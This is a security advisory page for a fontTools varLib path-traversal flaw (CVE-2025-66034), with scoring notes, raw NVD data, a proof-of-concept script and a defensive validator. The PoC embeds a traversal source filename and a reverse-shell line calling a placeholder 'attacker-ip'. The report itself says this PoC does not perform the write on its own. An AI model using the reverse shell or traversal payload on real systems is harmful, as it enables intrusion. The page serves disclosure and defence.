Security Vulnerability Report
CVE-2025-66034 CVSS 6.3 MEDIUM

CVE-2025-66034

Published: 2025-11-29 01:16:03
Last Modified: 2025-12-03 21:50:20

Description

fontTools is a library for manipulating fonts, written in Python. In versions from 4.33.0 to before 4.60.2, the fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main(). This issue has been patched in version 4.60.2.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:L
Weakness
CWE-91
Note on scoring
The 6.3 MEDIUM score is the secondary CVSS metric in the raw data below. It models a local attack in which a user is induced to run varLib on an attacker-supplied .designspace file (AV:L, UI:R) and the resulting write lands outside the component's own security scope (S:C, I:H). The NVD primary metric in the same raw data rates the issue 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), so treat the severity as deployment-dependent: a build service that compiles designspace files from untrusted contributors is closer to the NVD assessment than to the vendor one.

Configurations (Affected Products)

cpe:2.3:a:fonttools:fonttools:*:*:*:*:*:python:*:* - VULNERABLE
fontTools >= 4.33.0
fontTools < 4.60.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-66034 PoC - fontTools varLib Arbitrary File Write

Note: This PoC is for educational and security research purposes only.
Do not use for unauthorized testing or exploitation.
"""
import os

# Malicious .designspace file: the source filename carries a path-traversal
# string that points at /tmp/malicious.sh.
malicious_designspace = """<?xml version="1.0" encoding="utf-8"?>
<designspace format="1.0">
    <axes>
        <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/>
    </axes>
    <sources>
        <source filename="../../../../../../../../../tmp/malicious.sh" familyname="Test"/>
    </sources>
    <instances>
        <instance familyname="Test" stylename="Regular">
            <location>
                <dimension name="weight" value="400"/>
            </location>
            <glyph name="space" />
        </instance>
    </instances>
</designspace>
"""

# Payload intended to land at the traversed path
# (attacker-ip is a placeholder to be replaced in a lab).
malicious_payload = """#!/bin/bash
# Reverse shell or any malicious code
# This file would be written to arbitrary location via path traversal
/bin/bash -i >& /dev/tcp/attacker-ip/4444 0>&1
"""


def generate_poc(outdir="."):
    """Write the PoC files into outdir (default: current directory) and
    return their contents so they can be inspected or reused in a
    controlled environment."""
    designspace_path = os.path.join(outdir, "malicious.designspace")
    payload_path = os.path.join(outdir, "malicious.sh")
    with open(designspace_path, "w", encoding="utf-8") as fh:
        fh.write(malicious_designspace)
    with open(payload_path, "w", encoding="utf-8") as fh:
        fh.write(malicious_payload)

    print("CVE-2025-66034 PoC Generator")
    print("=" * 50)
    print("\nThis vulnerability allows arbitrary file write via")
    print("crafted .designspace files with path traversal.")
    print("\nGenerated files:")
    print(f"1. {designspace_path} - Malicious designspace file")
    print(f"2. {payload_path} - Payload to be written")
    print("\nUsage:")
    print(f"python3 -m fontTools.varLib {designspace_path}")
    print("\nNote: Test only in isolated environment!")

    return {
        "designspace": malicious_designspace,
        "payload": malicious_payload,
    }


if __name__ == "__main__":
    generate_poc()

Caveat: varLib reads each <source filename> as an input master; it does not write to that location. On its own this script therefore only produces the traversal string and the payload file. The vendor advisory GHSA-768j-98cg-p3fv (listed in the raw data below, tagged Exploit) documents the write path that the 4.60.2 fix addresses and should be consulted before relying on this PoC.
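A pre-flight gate that an integrator can run before handing a .designspace file to varLib, added here as an example; it is not fontTools project code and not part of the PoC above. It covers the two facts the report establishes: the affected version range [4.33.0, 4.60.2), and the fact that path-bearing attributes in an attacker-supplied designspace reach the filesystem. The attribute list (`filename` on `<source>`, `<instance>` and `<variable-font>`, plus the `<variable-font>` `name`, which is assumed to feed output filenames), the `/srv/fonts/project` root and the sample designspace are all assumptions constructed for the example.

```python
#!/usr/bin/env python3
"""Pre-flight checks before a .designspace file is handed to fontTools varLib.

Added example, not fontTools project code. Two independent checks:
  is_affected(version)          -- is fontTools in [4.33.0, 4.60.2)?
  find_unsafe_paths(xml, root)  -- does any path-bearing attribute resolve
                                   outside an allowed directory?
"""
import os
import re
import xml.etree.ElementTree as ET  # prefer defusedxml for untrusted input

AFFECTED_MIN = ((4, 33, 0), 1)  # first affected release (inclusive)
FIXED = ((4, 60, 2), 1)         # first fixed release (exclusive bound)

_VERSION_RE = re.compile(r"^\s*v?(\d+(?:\.\d+)*)(.*)$")


def parse_version(version):
    """Turn '4.60.2', '4.60.2rc1' or '4.60.2.dev0' into a comparable key.

    Key = (numeric tuple padded to 3 parts, final_flag). final_flag is 0 for
    pre-/dev-releases and 1 for final releases, so 4.60.2rc1 sorts before
    4.60.2 and is still treated as affected.
    """
    m = _VERSION_RE.match(version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    nums += (0,) * (3 - len(nums))
    is_final = 0 if m.group(2).strip() else 1
    return (nums, is_final)


def is_affected(version):
    """True when this fontTools version is in the vulnerable range."""
    return AFFECTED_MIN <= parse_version(version) < FIXED


# Attributes whose values become filesystem paths. `filename` on <source>,
# <instance> and <variable-font> are paths by definition of the designspace
# format; the <variable-font> `name` is included on the ASSUMPTION that it is
# used to derive output filenames, so it must be a bare filename stem.
PATH_ATTRIBUTES = {
    "source": ("filename",),
    "instance": ("filename",),
    "variable-font": ("filename", "name"),
}


def escapes_root(value, allowed_root):
    """True if `value`, resolved against allowed_root, lands outside it.

    os.path.join drops the root when `value` is absolute, and realpath
    collapses '..' segments and symlinks, so absolute paths and traversal
    are both caught by a single containment test.
    """
    root = os.path.realpath(allowed_root)
    target = os.path.realpath(os.path.join(root, value))
    try:
        return os.path.commonpath([root, target]) != root
    except ValueError:  # different drives on Windows: certainly outside
        return True


def bad_stem(value):
    """Reject anything that is not a single, plain path component."""
    norm = value.replace("\\", "/")
    return norm in ("", ".", "..") or "/" in norm


def find_unsafe_paths(designspace_xml, allowed_root):
    """Return (tag, attribute, value, reason) for every unsafe attribute."""
    findings = []
    for elem in ET.fromstring(designspace_xml).iter():
        for attr in PATH_ATTRIBUTES.get(elem.tag, ()):
            value = elem.get(attr)
            if value is None:
                continue
            if attr == "name":
                if bad_stem(value):
                    findings.append((elem.tag, attr, value, "not a bare filename stem"))
            elif escapes_root(value, allowed_root):
                findings.append((elem.tag, attr, value, "resolves outside allowed root"))
    return findings


def check_designspace_file(path, allowed_root=None):
    """Validate a file on disk; allowed_root defaults to the file's directory."""
    root = allowed_root or os.path.dirname(os.path.abspath(path))
    with open(path, "rb") as fh:
        return find_unsafe_paths(fh.read(), root)


# Constructed sample (not from the advisory): one benign source, then one
# source and one variable-font name that try to leave the project directory.
ALLOWED_ROOT = "/srv/fonts/project"  # assumed project directory
SAMPLE_DESIGNSPACE = """<?xml version="1.0" encoding="utf-8"?>
<designspace format="5.0">
  <axes>
    <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/>
  </axes>
  <sources>
    <source filename="masters/Test-Regular.ufo" familyname="Test" stylename="Regular">
      <location><dimension name="Weight" xvalue="400"/></location>
    </source>
    <source filename="../../../../../../../../../tmp/malicious.sh" familyname="Test" stylename="Bold">
      <location><dimension name="Weight" xvalue="900"/></location>
    </source>
  </sources>
  <variable-fonts>
    <variable-font name="../../../../tmp/outside" filename="out/TestVF.ttf">
      <axis-subsets><axis-subset name="Weight"/></axis-subsets>
    </variable-font>
    <variable-font name="TestVF-WeightOnly">
      <axis-subsets><axis-subset name="Weight"/></axis-subsets>
    </variable-font>
  </variable-fonts>
</designspace>
"""

if __name__ == "__main__":
    try:
        from fontTools import version as installed
        print("fontTools", installed, "affected:", is_affected(installed))
    except ImportError:
        print("fontTools not installed; skipping version check")
    for finding in find_unsafe_paths(SAMPLE_DESIGNSPACE, ALLOWED_ROOT):
        print("UNSAFE %s@%s=%r: %s" % finding)
```

Use it as a build-step gate: fail the job when `is_affected` is true or `find_unsafe_paths` returns anything. Set `allowed_root` to the directory that legitimately holds the masters (a project may keep them in a sibling folder, so the designspace's own directory is sometimes too narrow), and for XML from untrusted parties swap `xml.etree` for defusedxml before parsing.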

References

https://github.com/fonttools/fonttools/commit/a696d5ba93270d5954f98e7cab5ddca8a02c1e32 (Patch)
https://github.com/fonttools/fonttools/security/advisories/GHSA-768j-98cg-p3fv (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66034", "sourceIdentifier": "[email protected]", "published": "2025-11-29T01:16:02.967", "lastModified": "2025-12-03T21:50:20.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fontTools is a library for manipulating fonts, written in Python. In versions from 4.33.0 to before 4.60.2, the fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main(). This issue has been patched in version 4.60.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-91"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fonttools:fonttools:*:*:*:*:*:python:*:*", 
"versionStartIncluding": "4.33.0", "versionEndExcluding": "4.60.2", "matchCriteriaId": "76CBDF6D-E062-4632-8E9B-027EC11860C7"}]}]}], "references": [{"url": "https://github.com/fonttools/fonttools/commit/a696d5ba93270d5954f98e7cab5ddca8a02c1e32", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-768j-98cg-p3fv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-768j-98cg-p3fv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}